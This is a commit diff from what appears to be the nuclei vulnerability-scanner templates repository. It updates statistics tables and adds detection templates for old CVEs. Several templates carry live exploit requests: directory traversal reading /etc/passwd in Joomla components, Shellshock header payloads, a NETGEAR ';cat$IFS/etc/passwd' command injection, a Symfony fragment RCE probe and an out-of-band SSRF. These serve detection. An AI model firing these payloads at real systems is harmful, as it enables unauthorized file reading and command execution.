commit
d01835f36f
|
@ -32,4 +32,5 @@ jobs:
|
|||
- name: Template Validation
|
||||
run: |
|
||||
nuclei -validate -t . -exclude .pre-commit-config.yaml
|
||||
nuclei -validate -w ./workflows -exclude .pre-commit-config.yaml
|
||||
shell: bash
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 |
|
||||
| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 |
|
||||
| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 |
|
||||
| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 |
|
||||
| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | |
|
||||
| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
|
||||
| rce | 189 | gy741 | 72 | takeovers | 71 | | | | |
|
||||
| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | |
|
||||
| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | |
|
||||
| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | |
|
||||
| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 |
|
||||
| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 |
|
||||
| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 |
|
||||
| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 |
|
||||
| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | |
|
||||
| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
|
||||
| rce | 190 | gy741 | 72 | takeovers | 71 | | | | |
|
||||
| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | |
|
||||
| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | |
|
||||
| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | |
|
||||
|
||||
**146 directories, 1962 files**.
|
||||
**147 directories, 1989 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
1437
TEMPLATES-STATS.md
1437
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 |
|
||||
| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 |
|
||||
| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 |
|
||||
| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 |
|
||||
| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | |
|
||||
| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
|
||||
| rce | 189 | gy741 | 72 | takeovers | 71 | | | | |
|
||||
| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | |
|
||||
| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | |
|
||||
| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | |
|
||||
| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 |
|
||||
| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 |
|
||||
| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 |
|
||||
| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 |
|
||||
| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | |
|
||||
| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
|
||||
| rce | 190 | gy741 | 72 | takeovers | 71 | | | | |
|
||||
| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | |
|
||||
| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | |
|
||||
| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | |
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2010-1219
|
||||
info:
|
||||
name: Joomla! Component com_janews - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11757
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1219
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1304
|
||||
|
||||
info:
|
||||
name: Joomla! Component User Status - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11998
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1304
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1305
|
||||
|
||||
info:
|
||||
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12065
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1305
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1307
|
||||
|
||||
info:
|
||||
name: Joomla! Component Magic Updater - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12070
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1307
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1313
|
||||
|
||||
info:
|
||||
name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12082
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1313
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1354
|
||||
|
||||
info:
|
||||
name: Joomla! Component VJDEO 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12102
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1354
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1470
|
||||
|
||||
info:
|
||||
name: Joomla! Component Web TV 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12166
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1470
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1476
|
||||
|
||||
info:
|
||||
name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12150
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1476
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1494
|
||||
|
||||
info:
|
||||
name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12113
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1494
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1717
|
||||
|
||||
info:
|
||||
name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12291
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1717
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1980
|
||||
|
||||
info:
|
||||
name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12085
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1980
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1981
|
||||
|
||||
info:
|
||||
name: Joomla! Component Fabrik 2.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12087
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1981
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2122
|
||||
|
||||
info:
|
||||
name: Joomla! Component simpledownload 0.9.5 - Local File Disclosure
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12623
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2122
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -24,6 +24,7 @@ requests:
|
|||
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -25,11 +25,14 @@ requests:
|
|||
Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
|
||||
Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
|
||||
Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2015-4050
|
||||
|
||||
info:
|
||||
name: ESI unauthorized access
|
||||
author: ELSFA7110,meme-lord
|
||||
severity: high
|
||||
description: FragmentListener in the HttpKernel component in Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment.
|
||||
tags: cve,cve2015,symfony,rce
|
||||
reference:
|
||||
- https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-4050
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Credits"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2015-5461
|
||||
|
||||
info:
|
||||
name: StageShow <= 5.0.8 - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Open redirect vulnerability in the Redirect function in stageshow_redirect.php in the StageShow plugin before 5.0.9 for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-5461
|
||||
tags: redirect,cve,cve2015,wordpress,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
||||
part: header
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2016-6277
|
||||
|
||||
info:
|
||||
name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
|
||||
tags: cve,cves2016,netgear,rce,iot
|
||||
reference:
|
||||
- https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-6277
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -89,7 +89,7 @@ requests:
|
|||
- welcome
|
||||
|
||||
attack: sniper
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2017-18638
|
||||
|
||||
info:
|
||||
name: Graphite 'graphite.composer.views.send_email' SSRF
|
||||
author: huowuzhao
|
||||
severity: high
|
||||
description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
|
||||
reference:
|
||||
- http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
|
||||
- https://github.com/graphite-project/graphite-web/issues/2008
|
||||
- https://github.com/advisories/GHSA-vfj6-275q-4pvm
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-18638
|
||||
tags: cve,cve2017,graphite,ssrf,oob
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
|
@ -16,6 +16,7 @@ requests:
|
|||
- "{{BaseURL}}/wp-json/wp/v2/users/"
|
||||
- "{{BaseURL}}/?rest_route=/wp/v2/users/"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
@ -33,8 +34,9 @@ requests:
|
|||
- '"name":'
|
||||
- '"avatar_urls":'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '"name":"[^"]*"'
|
||||
- '"name":"[^"]*"'
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: WordPress Plugin Localize My Post 1.0 - LFI
|
||||
author: 0x_Akoko,0x240x23elu
|
||||
severity: high
|
||||
description: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter.
|
||||
reference: https://www.exploit-db.com/exploits/45439
|
||||
tags: wordpress,cve2018,cve,lfi
|
||||
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2018-8719
|
||||
|
||||
info:
|
||||
name: WordPress Plugin WP Security Audit Log 3.1.1 - Information Disclosure
|
||||
author: LogicalHunter
|
||||
severity: medium
|
||||
description: Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. For example, these files are indexed by Google and allows for attackers to possibly find sensitive information
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/44371
|
||||
- https://vuldb.com/?id.115817
|
||||
- https://www.cvedetails.com/cve/CVE-2018-8719/
|
||||
tags: wordpress,wp-plugin,cve,cve2018,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "[TXT]"
|
||||
- ".log"
|
||||
- "Index of"
|
||||
condition: and
|
|
@ -18,7 +18,6 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "phpmyadmin.net"
|
||||
|
|
|
@ -12,6 +12,8 @@ requests:
|
|||
- "{{BaseURL}}/base_import/static/c:/windows/win.ini"
|
||||
- "{{BaseURL}}/web/static/c:/windows/win.ini"
|
||||
- "{{BaseURL}}/base/static/c:/windows/win.ini"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -4,7 +4,10 @@ info:
|
|||
name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
|
||||
description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
|
||||
- https://www.cybersecurity-help.cz/vdb/SB2019041819
|
||||
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
|
|
|
@ -20,7 +20,7 @@ requests:
|
|||
ids: helpers/wordlists/numbers.txt
|
||||
attack: sniper
|
||||
threads: 50
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2019-17503
|
||||
|
||||
info:
|
||||
name: Kirona Dynamic Resource Scheduling - information disclosure
|
||||
author: LogicalHunter
|
||||
severity: medium
|
||||
description: An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly _ it contains sensitive information about the database through the SQL queries within this batch file
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/47498
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-17503
|
||||
tags: cve,cve2019,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/osm/REGISTER.cmd"
|
||||
- "{{BaseURL}}/osm_tiles/REGISTER.cmd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "DEBUGMAPSCRIPT=TRUE"
|
||||
- "@echo off"
|
||||
condition: and
|
|
@ -8,6 +8,8 @@ info:
|
|||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
|
||||
- https://seclists.org/fulldisclosure/2019/Mar/26
|
||||
- https://www.exploit-db.com/exploits/46537
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
|
||||
tags: cve,cve2019,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
|
@ -17,7 +19,6 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
|
|
@ -1,26 +0,0 @@
|
|||
id: CVE-2019-9618
|
||||
|
||||
info:
|
||||
name: GraceMedia Media Player 1.0 - Local File Inclusion
|
||||
author: 0x_Akoko
|
||||
severity: critical
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/46537
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
|
||||
tags: cve,cve2019,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2020-11547
|
||||
|
||||
info:
|
||||
name: PRTG Network Monitor < 20.1.57.1745 - Information Disclosure
|
||||
author: x6263
|
||||
severity: medium
|
||||
description: PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself via an HTTP request.
|
||||
reference:
|
||||
- https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-11547
|
||||
tags: cve,cve2020,prtg,disclosure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/public/login.htm?type=probes"
|
||||
- "{{BaseURL}}/public/login.htm?type=requests"
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "contains((body_1), 'Probe #1') && contains((body_2), '<span>Configuration Requests Sent</span>')"
|
||||
part: body
|
||||
|
||||
- type: word
|
